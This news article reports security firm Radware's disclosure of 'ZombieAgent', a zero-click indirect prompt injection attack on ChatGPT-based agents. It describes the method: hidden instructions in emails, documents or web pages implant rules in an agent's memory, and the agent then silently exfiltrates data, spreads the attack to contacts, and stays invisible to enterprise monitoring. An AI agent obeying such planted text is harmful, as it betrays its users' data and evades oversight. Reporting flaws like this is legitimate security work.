‘ZombieAgent’ flaw exposes blind spots in ChatGPT AI

Cybersecurity firm Radware has disclosed a new vulnerability, dubbed “ZombieAgent”, that targets OpenAI’s ChatGPT-based AI agents and allows silent data theft and autonomous spread across organisations without user interaction.

The company said the zero-click indirect prompt injection flaw affects agentic AI workflows that rely on ChatGPT models to read emails, documents and web pages, and to trigger actions in connected systems. The weakness involves hidden instructions embedded in ordinary content that AI agents process as part of routine tasks.

Radware said ZombieAgent directs compromised ChatGPT agents to exfiltrate sensitive customer and corporate data from OpenAI’s infrastructure. The attack runs on the service side in the cloud rather than on user devices or corporate networks.

According to the researchers, this design means existing monitoring and logging tools inside organisations may not register the activity. They said this creates blind spots in environments that depend on AI agents for decision-making and workflow automation.

Persistent hijacking

Radware described ZombieAgent as an evolution of its previously reported ShadowLeak research on indirect prompt injection. ShadowLeak showed how attackers could influence the behaviour of AI agents through crafted content. The new finding adds a persistence layer that affects agents’ long-term operation.

The company said ZombieAgent can implant malicious rules into an AI agent’s long-term memory or working notes. The agent then follows those rules in future interactions without further contact from the attacker.

Once implanted, the rules trigger hidden actions every time the agent runs. The agent can silently collect sensitive information over extended periods. It can also distribute the infection.

Radware said the attack can propagate across additional contacts or email recipients. A single malicious email can therefore act as an initial vector. The firm warned that this behaviour could create a worm-like campaign that spreads through and beyond a single organisation.

“ZombieAgent illustrates a critical structural weakness in today’s agentic AI platforms,” said Pascal Geenens, Vice President, Threat Intelligence, Radware. “Enterprises rely on these agents to make decisions and access sensitive systems, but they lack visibility into how agents interpret untrusted content or what actions they execute in the cloud. This creates a dangerous blind spot that attackers are already exploiting.”

Zero-click attack path

The vulnerability exploits the guardrails that aim to protect ChatGPT agents from prompt injection. Radware’s research team found that attackers can still plant concealed directives inside everyday content.

The firm said adversaries can hide instructions inside emails, documents or web pages. AI agents that summarise inboxes or process documents interpret these as commands. No additional user action is needed after the malicious content enters the system.

Once activated, a compromised agent can collect mailbox data. It can access sensitive files and interact with external servers. All activity takes place as part of the agent’s normal operation.

Radware said no “click” or confirmation from the user is required at any stage. The exploit therefore falls into the zero-click category, which often proves difficult for organisations to mitigate.

Cloud-side invisibility

A key element of ZombieAgent is its focus on cloud infrastructure rather than endpoints. Radware said all malicious activity runs within OpenAI’s environment that hosts the ChatGPT models and agent workflows.

The attacker does not need to compromise user devices. The exploit does not rely on code that runs directly inside corporate networks. As a result, endpoint logs do not record the activity.

Radware said no network traffic from the malicious actions passes through standard corporate security tools. It listed secure web gateways, endpoint detection and response tools and firewalls among the systems that may not see the exfiltration flows.

The firm said this cloud-side execution means no traditional alerts warn security teams or users that data has been accessed or moved. It described ZombieAgent as difficult to detect or block using current enterprise controls.

Expanding threat surface

The research follows earlier work on ShadowLeak, which highlighted risks in what Radware calls the “agentic threat surface”. This surface covers AI agents that read and write emails, interact with corporate applications, start workflows and make autonomous decisions based on content they ingest.

Radware said the new findings show how attackers can take advantage of the rapid rollout of such AI automation. It warned that the same features that make AI agents more useful in business also increase their attractiveness as a target.

The company said it disclosed the ZombieAgent vulnerability to OpenAI under responsible disclosure processes. It plans to publish a full technical analysis with defence guidance.

Radware will outline the research in a dedicated webinar for security leaders and AI developers. The session will examine the attack sequence, potential mitigations for AI agents and directions for future threat research around agentic AI.

“Enterprises rely on these agents to make decisions and access sensitive systems, but they lack visibility into how agents interpret untrusted content or what actions they execute in the cloud. This creates a dangerous blind spot that attackers are already exploiting,” said Geenens.